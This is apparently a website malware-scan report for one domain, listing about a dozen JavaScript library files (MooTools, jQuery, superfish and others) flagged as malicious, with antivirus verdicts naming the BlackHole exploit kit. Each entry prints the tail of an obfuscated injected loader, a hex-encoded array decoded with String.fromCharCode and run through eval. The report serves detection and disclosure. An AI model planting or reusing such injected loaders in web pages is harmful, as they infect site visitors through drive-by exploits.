Request | Server response | Status |
http://vmjglaw.com/ | 200 OK Content-Length: 7481 Content-Type: text/html | clean |
http://vmjglaw.com/./js/core.js | 200 OK Content-Length: 102937 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var MooTools = { 'version': '1.2.1', 'build': '0d4845aab3d9a4fdee2f0d4a6dd59210e4b697cf' }; var Native = function(options){ options = options || {}; var name = options.name; var legacy = options.legacy; var protect = options.protect; var methods = options.implement; var generics = options.generics; var initialize = options.initialize; var afterImplement = options.afterImplement || function(){}; var object = initialize || legacy;
... 3232 bytes are skipped ...:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- Rising
- JS:Trojan.JS.OddException/Heur!1.9F0A
- nProtect
- JS:Exploit.BlackHole.HB
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WS
- GData
- JS:Exploit.BlackHole.HB
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/more.js | 200 OK Content-Length: 45260 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) Fx.Slide = new Class({ Extends: Fx, options: { mode: 'vertical' }, initialize: function(element, options){ this.addEvent('complete', function(){ this.open = (this.wrapper['offset' + this.layout.capitalize()] != 0); if (this.open && Browser.Engine.webkit419) this.element.dispose().inject(this.wrapper); }, true); this.element = this.subject = $(element); this.parent(options); var wrapper = this.element.retrieve('wrapper'
... 3246 bytes are skipped ...:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- JS.Exploit.BlackHole
- Rising
- JS:Trojan.JS.OddException/Heur!1.9F0A
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WS
- GData
- JS:Exploit.BlackHole.HB
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/en.js | 200 OK Content-Length: 5968 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) formcheckLanguage = { required: "This field is required.", lastname: "Required last name.", alpha: "This field accepts alphabetic characters only.", alphanum: "This field accepts alphanumeric characters only.", nodigit: "No digits are accepted.", digit: "Please enter a valid integer.", digitmin: "The number must be at least %0", digitltd: "The value must be between %0 and %1", number: "Please enter a valid number.", email: "Please enter a valid e
... 3130 bytes are skipped ...:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.HB
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/formcheck.js | 200 OK Content-Length: 39231 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var FormCheck = new Class({ Implements: [Options, Events], options : { tipsClass: 'fc-tbx', errorClass: 'fc-error', fieldErrorClass: 'fc-field-error', trimValue : false, validateDisabled : false, submitByAjax : false, ajaxResponseDiv : false, ajaxEvalScripts : false, onAjaxRequest : $empty, onAjaxSuccess : $empty, onAjaxFailure : $empty, display : { showErrors : 0, titlesInsteadNames :
... 3231 bytes are skipped ...:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WS
- GData
- JS:Exploit.BlackHole.HB
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/jquery-1.4.2.min.js | 200 OK Content-Length: 76989 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o]
... 3138 bytes are skipped ...:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- Rising
- JS:Trojan.JS.OddException/Heur!1.9F0A
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WS
- GData
- JS:Exploit.BlackHole.HB
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/jquery.cycle.all.js | 200 OK Content-Length: 47789 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($) { var ver = '2.72'; if ($.support == undefined) { $.support = { opacity: !($.browser.msie) }; } function debug(s) { if ($.fn.cycle.debug) log(s); } function log() { if (window.console && window.console.log) window.console.log('[cycle] ' + Array.prototype.join.call(arguments,' ')); }; $.fn.cycle = function(options, arg2) { var o = { s: this.selector, c: this.context }; if (this.length === 0 &
... 3285 bytes are skipped ...:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- Rising
- JS:Trojan.JS.OddException/Heur!1.9F0A
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WS
- GData
- JS:Exploit.BlackHole.HB
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/easy.js | 200 OK Content-Length: 12222 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(8($){$.2O={2P:8(3){6 f={g:\'#2Q 2R\',1r:\'2S\'};b(F 3==\'G\')f.g=3;6 3=$.H(f,3);s $(3.g).q(8(){$(4).1T(8(){$(\'1U:1V\',4).14(P);$(\'a:1V\',4).1s(3.1r)},8(){$(\'1U\',4)
... 3051 bytes are skipped ...:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WS
- GData
- JS:Exploit.BlackHole.HB
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/jquery.prettyphoto.js | 200 OK Content-Length: 21565 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.prettyPhoto={version:'2.5.5'};$.fn.prettyPhoto=function(settings){settings=jQuery.extend({animationSpeed:'normal',opacity:0.80,showTitle:true,allowresize:true,default_width:500,default_height:344,counter_separator_label:'/',theme:'light_rounded',hideflash:false,wmode:'opaque',autoplay:true,modal:false,changepicturecallback:function(){},callback:function(){},markup:'<div class="pp_pic_holder"> \ <div class="pp_top"> \ <div class="pp_left"><
... 3525 bytes are skipped ...:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Rising
- HTML:Trojan.JS.OddException/Heur!1.9F0A
- nProtect
- JS:Exploit.BlackHole.HB
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WS
- GData
- JS:Exploit.BlackHole.HB
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/custom.js | 200 OK Content-Length: 60578 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.noConflict(); jQuery(document).ready(function(){ lightbox("a[rel^='prettyPhoto'], a[rel^='lightbox']"); }); function lightbox($elements) { jQuery($elements).prettyPhoto({ "theme": 'light_rounded' }); jQuery($elements).each(function() { var $image = jQuery(this).contents("img"); $newclass = 'lightbox_video'; if(jQuery(this).attr('href').match(/(jpg|gif|jpeg|png|tif)/)) $newclass = 'lightbox_image'; <
... 3300 bytes are skipped ...:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- Rising
- JS:Trojan.JS.OddException/Heur!1.9F0A
- nProtect
- JS:Exploit.BlackHole.HB
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WS
- GData
- JS:Exploit.BlackHole.HB
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/superfish.js | 200 OK Content-Length: 8584 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men
... 3294 bytes are skipped ...:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- Rising
- JS:Trojan.JS.OddException/Heur!1.9F0A
- nProtect
- JS:Exploit.BlackHole.HB
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.HB
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/effects.js | 200 OK Content-Length: 6004 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){ $(document).ready(function() { $('ul.sf-menu').superfish({ delay: 200, animation: {opacity:'show',height:'show'}, autoArrows: false, dropShadows: false, speed: "fast" }); }); })(jQuery); (function($){ $(document).ready(function(){ $(".sf-menu ul a").css({ paddingLeft: "15px", backgroundPosition: "0px 12px"
... 3125 bytes are skipped ...:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.HB
- Comodo
- Exploit.JS.Expack.G
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.HB
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/dd_belatedpng_0.0.8a.js | 200 OK Content-Length: 16876 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var DD_belatedPNG = { ns: 'DD_belatedPNG', imgSize: {}, delay: 10, nodesFixed: 0, createVmlNameSpace: function () { if (document.namespaces && !document.namespaces[this.ns]) { document.namespaces.add(this.ns, 'urn:schemas-microsoft-com:vml'); } }, createVmlStyleSheet: function () { var screenStyleSheet, printStyleSheet; screenStyleSheet = document.createElement('style'); screenStyleSheet.setAttribute('media'
... 3208 bytes are skipped ...:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:65:27:30:1f:20:32:4:1:74:4:1:74"[zrtumg](":");}wkbirr=xvy;nzjr=[];for(sprvk=22-20-2;-sprvk+1387!=0;sprvk+=1){ljxkw=sprvk;if((0x19==031))nzjr+=String.fromCharCode(eval(fjeic+wkbirr[1*ljxkw])+0xa-qao);}oyathv=eval;oyathv(nzjr)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.HB
- Ikarus
- Virus.JS.Exploit
- Rising
- JS:Trojan.JS.OddException/Heur!1.9F0A
- nProtect
- JS:Exploit.BlackHole.HB
- Emsisoft
- JS:Exploit.BlackHole.HB (B)
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.HB
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgzaxv
- F-Secure
- JS:Exploit.BlackHole.HB
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WS
- GData
- JS:Exploit.BlackHole.HB
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.HB
|
http://vmjglaw.com/./js/cufon-yui.js | 200 OK Content-Length: 23127 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&
